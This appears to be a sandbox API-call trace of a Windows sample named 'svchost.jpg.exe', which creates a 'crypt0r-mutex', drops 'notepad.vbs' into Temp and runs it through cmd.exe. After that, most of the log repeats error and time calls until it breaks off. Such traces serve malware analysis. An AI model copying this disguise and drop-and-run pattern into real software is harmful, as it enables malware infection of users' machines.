SetLastError (dwErrCode=0x57) [0019.655] GetLastError () returned 0x57 [0019.655] SetLastError (dwErrCode=0x57) [0019.655] GetLastError () returned 0x57 [0019.655] SetLastError (dwErrCode=0x57) [0019.655] GetLastError () returned 0x57 [0019.655] SetLastError (dwErrCode=0x57) [0019.655] GetLastError () returned 0x57 [0019.655] SetLastError (dwErrCode=0x57) [0019.656] GetLastError () returned 0x57 [0019.656] SetLastError (dwErrCode=0x57) [0019.656] GetLastError () returned 0x57 [0019.656] SetLastError (dwErrCode=0x57) [0019.656] GetLastError () returned 0x57 [0019.656] SetLastError (dwErrCode=0x57) [0019.656] GetLastError () returned 0x57 [0019.656] SetLastError (dwErrCode=0x57) [0019.656] GetLastError () returned 0x57 [0019.656] SetLastError (dwErrCode=0x57) [0019.657] GetCurrentThread () returned 0xfffffffe [0019.657] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x5af9a0, lpExitTime=0x5af9a8, lpKernelTime=0x5af9a8, lpUserTime=0x5af9a8 | out: lpCreationTime=0x5af9a0, lpExitTime=0x5af9a8, lpKernelTime=0x5af9a8, lpUserTime=0x5af9a8) returned 1 [0019.657] RtlInitializeSListHead (in: ListHead=0x2e8ae0 | out: ListHead=0x2e8ae0) [0019.659] GetStartupInfoW (in: lpStartupInfo=0x5af990 | out: lpStartupInfo=0x5af990*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\svchost.jpg.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0019.659] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="crypt0r-mutex") returned 0x5c [0019.659] GetLastError () returned 0x0 [0019.659] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x5af2ac | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0019.660] AreFileApisANSI () returned 1 [0019.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c7570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0019.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c7570, cbMultiByte=-1, lpWideCharStr=0x9c7600, cchWideChar=49 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 49 [0019.661] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\notepad.vbs"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x5af048, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0019.662] GetFileType (hFile=0x60) returned 0x1 [0019.662] GetLastError () returned 0x0 [0019.662] SetLastError (dwErrCode=0x0) [0019.662] GetLastError () returned 0x0 [0019.662] SetLastError (dwErrCode=0x0) [0019.662] GetLastError () returned 0x0 [0019.662] SetLastError (dwErrCode=0x0) [0019.662] GetLastError () returned 0x0 [0019.662] SetLastError (dwErrCode=0x0) [0019.662] GetLastError () returned 0x0 [0019.662] SetLastError (dwErrCode=0x0) [0019.662] GetLastError () returned 0x0 [0019.663] SetLastError (dwErrCode=0x0) [0019.663] GetLastError () returned 0x0 [0019.663] SetLastError (dwErrCode=0x0) [0019.663] GetLastError () returned 0x0 [0019.663] SetLastError (dwErrCode=0x0) [0019.663] GetLastError () returned 0x0 [0019.663] SetLastError (dwErrCode=0x0) [0019.663] GetLastError () returned 0x0 [0019.663] SetLastError (dwErrCode=0x0) [0019.663] GetLastError () returned 0x0 [0019.663] SetLastError (dwErrCode=0x0) [0019.664] GetLastError () returned 0x0 [0019.664] GetProcAddress (hModule=0x75a20000, lpProcName="FlsGetValue") returned 0x75a31252 [0019.664] SetLastError (dwErrCode=0x0) [0019.664] WriteFile (in: hFile=0x60, lpBuffer=0x5adcbc*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x5adcb8, lpOverlapped=0x0 | out: lpBuffer=0x5adcbc*, lpNumberOfBytesWritten=0x5adcb8*=0xfc, lpOverlapped=0x0) returned 1 [0019.665] CloseHandle (hObject=0x60) returned 1 [0019.667] GetLastError () returned 0x0 [0019.667] SetLastError (dwErrCode=0x0) [0019.667] GetLastError () returned 0x0 [0019.667] SetLastError (dwErrCode=0x0) [0019.667] AreFileApisANSI () returned 1 [0019.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c4ef0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0019.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c4ef0, cbMultiByte=-1, lpWideCharStr=0x9c7610, cchWideChar=28 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe") returned 28 [0019.668] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x5af114 | out: lpFileInformation=0x5af114*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bdd4861, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bdd4861, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bdd4861, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x49e00)) returned 1 [0019.668] GetLastError () returned 0x0 [0019.668] SetLastError (dwErrCode=0x0) [0019.668] AreFileApisANSI () returned 1 [0019.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c4ef0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0019.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c4ef0, cbMultiByte=-1, lpWideCharStr=0x9c7668, cchWideChar=28 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe") returned 28 [0019.668] AreFileApisANSI () returned 1 [0019.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c7610, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0019.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x9c7610, cbMultiByte=-1, lpWideCharStr=0x9c78d0, cchWideChar=80 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe /c C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 80 [0019.668] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /c C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x5af0f4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x144, lpReserved2=0x9c7a70, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5af138 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpProcessInformation=0x5af138*(hProcess=0x64, hThread=0x60, dwProcessId=0x96c, dwThreadId=0x970)) returned 1 [0019.698] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0025.795] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x5af14c | out: lpExitCode=0x5af14c*=0x0) returned 1 [0025.795] CloseHandle (hObject=0x60) returned 1 [0025.795] CloseHandle (hObject=0x64) returned 1 [0025.795] GetLastError () returned 0x0 [0025.795] SetLastError (dwErrCode=0x0) [0025.796] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0025.796] GetLastError () returned 0x57 [0025.796] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xee92c710, dwHighDateTime=0x1d4a418)) [0025.796] GetLastError () returned 0x57 [0025.796] SetLastError (dwErrCode=0x57) [0025.796] GetLastError () returned 0x57 [0025.796] SetLastError (dwErrCode=0x57) [0025.796] GetLastError () returned 0x57 [0025.797] SetLastError (dwErrCode=0x57) [0025.797] GetLastError () returned 0x57 [0025.797] SetLastError (dwErrCode=0x57) [0025.797] GetLastError () returned 0x57 [0025.797] SetLastError (dwErrCode=0x57) [0025.797] GetLastError () returned 0x57 [0025.797] SetLastError (dwErrCode=0x57) [0025.797] GetLastError () returned 0x57 [0025.797] SetLastError (dwErrCode=0x57) [0025.797] GetLastError () returned 0x57 [0025.797] SetLastError (dwErrCode=0x57) [0025.797] GetLastError () returned 0x57 [0025.797] SetLastError (dwErrCode=0x57) [0025.797] Sleep (dwMilliseconds=0x3e8) [0029.994] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.994] SetLastError (dwErrCode=0x57) [0029.994] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.995] SetLastError (dwErrCode=0x57) [0029.995] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.996] SetLastError (dwErrCode=0x57) [0029.996] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.997] GetLastError () returned 0x57 [0029.997] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.998] SetLastError (dwErrCode=0x57) [0029.998] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0029.999] SetLastError (dwErrCode=0x57) [0029.999] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.000] SetLastError (dwErrCode=0x57) [0030.000] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.001] SetLastError (dwErrCode=0x57) [0030.001] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.002] SetLastError (dwErrCode=0x57) [0030.002] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.003] SetLastError (dwErrCode=0x57) [0030.003] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.004] SetLastError (dwErrCode=0x57) [0030.004] GetLastError () returned 0x57 [0030.005] SetLastError (dwErrCode=0x57) [0030.005] GetLastError () returned 0x57 [0030.005] SetLastError (dwErrCode=0x57) [0030.005] GetLastError () returned 0x57 [0030.005] SetLastError (dwErrCode=0x57) [0030.005] GetLastError () returned 0x57 [0030.005] SetLastError (dwErrCode=0x57) [0030.005] GetLastError () returned 0x57 [0030.005] SetLastError (dwErrCode=0x57) [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetLastError () returned 0x57 [0030.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.005] GetLastError () returned 0x57 [0030.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.005] GetLastError () returned 0x57 [0030.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: lpSystemTimeAsFileTime=0x5af358*(dwLowDateTime=0xef2d8070, dwHighDateTime=0x1d4a418)) [0030.006] GetLastError () returned 0x57 [0030.006] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x5af358 | out: 